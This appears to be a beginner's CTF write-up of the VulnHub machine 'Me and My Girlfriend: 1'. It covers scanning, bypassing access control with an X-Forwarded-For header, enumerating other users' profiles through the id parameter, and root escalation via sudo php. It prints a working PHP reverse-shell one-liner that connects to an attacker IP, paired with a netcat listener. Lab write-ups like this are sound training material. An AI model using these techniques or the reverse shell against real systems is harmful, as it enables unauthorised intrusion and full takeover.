Me and My Girlfriend: 1 machine crack

This my 1st writeup. so, please forget my mistake.

The machine was released on 13 Dec 2019.(Here is the link:https://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/)

Difficulty Level: Beginner

Notes: there are 2 flag files

Learning: Web Application | Simple Privilege Escalation

This is a boot to root challenge.

let us start hacking!

Run the simple command in your terminal :arp-scan — localnet

after that, we see there is a IP address(192.168.50.138) where my Vulnerability VM running.

I want to know which service was running on that machine. for that I use Nmap.

Here we see that port 80 was open. that means there was webservice was running.

just type the ip in your web browser

when i visit , it gives me this message , i think it gives me any Hint (like only admin or any local address access this ,like 127.0.0.1)

open the source code(ctrl+U)

Here some message it gives me , I think it may be another any Hint. when i see x-forwarded-for, I am pretty sure their maybe any HOST HEADER attack possible. for testing host header, I refresh the page and

Intercept the trafic in burp suite

After intercept i simply added this header
X-Forwarded-For: localhost

boom we got an interesting page 😎😎😎

it looks like any sign/signup page..😉🤷‍♂️

click on login tap

I think there may be any SQL injection. so i brute force some payload .but I failed.😢😢

Click on Register tab

here I registered myself in the register area and logged in😜😜

when I see the id parameter in the URL, I think there some parameter pollution bug. so change it from 0 to 12. when id =5; it gives me some interesting thing.🤷‍♀️🤷‍♀️

change id =5 in URL

That means some existing user in at id =5;

click on profile

Boom I got some user details.🤑🤑

In this CTF, If you remember in the description, Alice was very important to the scenario. 🚑🚑

Then I remembered that we also had a ssh port open and i loggin it via ssh

After logging,i find for flag1 . for that, I was ls -a command

IN .my_secrect folder looks like some juicy so enter in that folder.

BOOM I find flag1 😎✌🤞🤞, now looking for priv esc👀👀👀👀🐱‍👤

now i look for sudo rights for that, I use this command sudo -l

Here I see , Alice can run PHP program as a Root user

so i run this command

sudo /usr/bin/php -r ‘$sock=fsockopen(“192.168.50.128”,1234);exec(“/bin/sh -i <&3 >&3 2>&3”);’

as well as I run netcat for listing at 1234 port

BOOM i got root shell😎🐱‍👤🐱‍👤🐱‍👤🐱‍🏍🐱‍🏍🐱‍🏍

now it’s time for find the flag2😁😁😁😁

so I move to root .then type ls command and find flag2

Thanks for reading my blog ..i hope it will help you😁😁🐱‍👤🐱‍👤😎😎

--

--

--

I am a noob , who always ready to help you in a different way.

Love podcasts or audiobooks? Learn on the go with our new app.

How to Participate in Rabbit Finance in just 3 Minutes

Securing Public API Through Obscurity

Data Warehouses for the SnowFlake SnowPro Core Certification

Multi-cluster warehouse diagram.

Testing your Spring Boot service with Couchbase more efficiently

After Centos

Microservices, Event sourcing & CQRS — Part 4

Flask — from development to deployment in 15 minutes

Scribe: Our project is kicking off

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
lone_wolf

lone_wolf

I am a noob , who always ready to help you in a different way.

More from Medium

Paper - HackTheBox [Writeup]

DC-2 — VulnHub

SQL Injection is Where Clause — Burp Academy Labs

Write-up: Blind SQL injection with conditional errors @ PortSwigger Academy